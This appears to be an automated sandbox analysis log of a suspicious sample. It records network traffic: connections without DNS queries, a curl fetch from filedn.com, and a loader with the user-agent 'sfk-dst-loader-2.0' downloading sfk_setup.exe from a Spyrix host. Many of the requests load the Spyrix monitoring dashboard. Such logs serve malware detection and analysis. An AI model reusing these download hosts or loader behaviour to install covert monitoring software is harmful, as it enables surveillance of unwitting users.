Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 71_2_003973D0 recv,send,WSAGetLastError,

71_2_003973D0

Source: global traffic	HTTP traffic detected: GET /lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404 HTTP/1.1Host: filedn.comUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s6 HTTP/1.1Host: filedn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XYT5nbVGers4f7G&MD=VVPG9a78 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /loader/link.php?prg_id=sfk HTTP/1.1Host: cdnbaynet.comUser-Agent: sfk-dst-loader-2.0Accept: /
Source: global traffic	HTTP traffic detected: GET /download/sfk/sfk_setup.exe HTTP/1.1Host: swtb-download.spyrix-sfk.comUser-Agent: sfk-dst-loader-2.0Accept: /
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XYT5nbVGers4f7G&MD=VVPG9a78 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: dashboard.spyrix.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-93c74fef.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-004f4025.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn.js HTTP/1.1Host: dashboard.spyrix.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-004f4025.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dashboard.spyrix.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-08b2a987.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn.js HTTP/1.1Host: dashboard.spyrix.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ConfirmPhoneModal-86d79a8a.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Nunito-Regular-73dcaa51.woff2 HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-5393c481.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button-ca236c00.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonTemplate-fd9601a7.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText-ead06ca1.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Modal-04ffda94.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Input-34212571.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-ef960fb7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-1178777c.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ConfirmPhoneModal.module-3f369b32.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Text.vue_vue_type_script_setup_true_lang-a664542d.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dashboard.spyrix.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-08b2a987.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-7e7c447a.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-1178777c.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button.module-6d4e91b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonTemplate.module-c837805f.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-5393c481.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Text.vue_vue_type_script_setup_true_lang-a664542d.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-ef960fb7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ConfirmPhoneModal.module-3f369b32.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText.module-c769b9ae.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Modal.module-d62c47b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button.vue_vue_type_script_setup_true_lang-56edf5a6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/useValidation-954c07e6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Input.vue_vue_type_script_setup_true_lang-31858815.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/loop-c45f0f1e.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonTemplate.module-c837805f.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button.module-6d4e91b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Modal.module-d62c47b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
